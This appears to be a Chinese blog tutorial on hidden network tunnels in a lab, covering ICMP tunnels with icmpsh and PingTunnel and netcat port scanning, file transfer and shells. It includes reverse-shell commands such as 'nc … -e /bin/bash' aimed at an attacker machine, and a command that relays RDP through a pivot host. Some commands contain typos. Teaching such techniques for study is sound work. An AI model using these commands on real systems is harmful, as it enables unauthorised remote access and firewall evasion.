隐藏通信隧道技术(上)

目录

一、防火墙的配置

二、kali虚拟机网卡配置

三、隐藏隧道技术的基础知识

1.什么是隧道技术:

2.检测内网连通性

3.利用icmp创建隧道

(1)使用的工具:  icmpsh

(2)工具:Pingtunnel

4.传输层隧道技术

4.1使用nc工具创建隧道


一、防火墙的配置

1..首先进去防火墙,此时我们需要配置符合自己环境的ip

2. 先配置lan ip

  1. 首先需要输入2,配置ip地址(仅主机)
  2. 输入子网掩码位数
  3. 是否需要dhcp服务
  4. 注意:此时需要配置仅主机模式的ip,如果没有仅主机的网卡就自己手动添加一个

3..然后继续配置wan的ip地址

  • 使用设置号的lan ip地址在浏览器输入
  • 然后输入密码与账号登录

最后点击保存即可

然后重启防火墙即可

二、kali虚拟机网卡配置

auto eth0
iface eth0 inet static
address 10.2.1.88
netmask 255.255.255.0
gateway 10.2.1.8

auto eth1
iface eth1 inet static
address 172.31.1.88
netmask 255.255.255.0
gateway 172.31.1.2

配置kali2019的网卡

auto eth0
iface eth0 inet static
address 10.2.1.170
netmask 255.255.255.0
gateway 10.2.1.1

 尝试是否可以内网互通

(1)查看是否可以ping通外网

 (2)查看是否可以ping通web服务器

 此时环境搭建成功

三、隐藏隧道技术的基础知识

1.什么是隧道技术:

隧道技术是一种通过使用互联网络基础设施在网络之间传递数据的方式。使用隧道传递的数据(或负载)可以是不同协议的数据帧或包。隧道协议将这些其他协议的数据帧或包重新封装在新的包头中发送。新的包头提供了路由信息,从而使封装的负载数据能够通过互联网络传递。

2.检测内网连通性

  • icmp :ping
  • tcp:  nc ip port
  • http: curl ip :port
  • dns :nslookup www.baidu.com vsp-ip​​​

3.利用icmp创建隧道

(1)使用的工具:  icmpsh

  1. git clone https://github.com/inquisb/icmpsh.git 下载icmpsh
  2. apt-get install python3-impacket 下载脚本
  3. sysctl –w net.ipv4.icmp_echo_ignore_all=1 关闭无数次ping
  4. echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all 关闭无数次ping
  5. ./icmpsh_m.py 172.31.1.88 172.31.1.69  
  6. 然后再目标主机上运行icmpsh脚本
  7. Icmpsh.exe –t ip(需要你自己边界服务器的ip) –d 500 –b 30 –s 128
  8. 查看kali发现反弹shell成功

(2)工具:Pingtunnel

我们需要将内网的web服务器(kali2021)作为一跳板,使得外网的服务器(kali2019)获取到内网的3389端口

下载地址:Ping Tunnel – Freecode

  1. tar zxvf PingTunnel-0.72.tar.gz 解压
  2. cd PingTunnel     make && make install 安装
  3. ptunnel –x 123 在边界服务器上运行,123是密码
  4. 安装时会报错(让我们一一解决)
    1. 第一错误:configure: error: Neither flex nor lex was found.
    2. 解决:apt install flex bison
    3. 第二个错误:缺少pcap.h 
    4. 解决:wegt:http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz
    5. taz zxvf libpcap-1.9.0.tar.gz
    6. cd libpcap-1.9.0.tar.gz
    7. ./configure 安装
    8. 第三个错误:yacc包错误
    9. 解决:sudo apt-get install -y byacc
    10. ./configure make
    11. sudo make install  安装 
  5. 首先开启ptunnel –x 123
  6. 在kali2019上边运行:ptunnel –p 10.2.1.88(跳板ip地址) –lp 1080 –da 172.31.1.69(目标ip地址)–dp 3389 –x 123

4.传输层隧道技术

4.1使用nc工具创建隧道

常用工具: Lcx  Netcat  powercat 

4.1.1 Netcat的使用

  1. banner抓取
  2. 命令:nc –nv 172.31.1.69 80
  3. 连接远程主机
  4. 端口扫描
  5. nc –v 172.31.1.69 80
  6. 端口监听(反弹shell)
    1. nc -lvp 666
    2. nc 10.2.1.88 6666 -e /bin/bash
  7. 文件传输
    1. nc –lp 333 >1.txt             将333端口获取到的信息导入1.txt中     
    2. nc –vn 监听主机ip 333 < test.txt    将test.txt中的信息传输到ip的333端口
    3. nc -lvp 1111 > /tmp/1..txt  将监听的文件存放到1.TXT文件下
    4. 在kali2019下输入nc -nv 10.2.1.88 1111 > /tmp/1.txt
    5. 在kali2021下查看文件
  8. 简易聊天
    1. 只要监听一个端口即可,然后让其他主机访问该端口就可以实现简易聊天
  9. 正向shell(他不知道将shell给谁,谁来连他就给谁shell)
    1. 将目标主机的shell给到其他服务器
  10. 反向shell(你只需要监听端口即可,那个主机访问这个端口就获得该主机的shell)

  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一句话木马

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值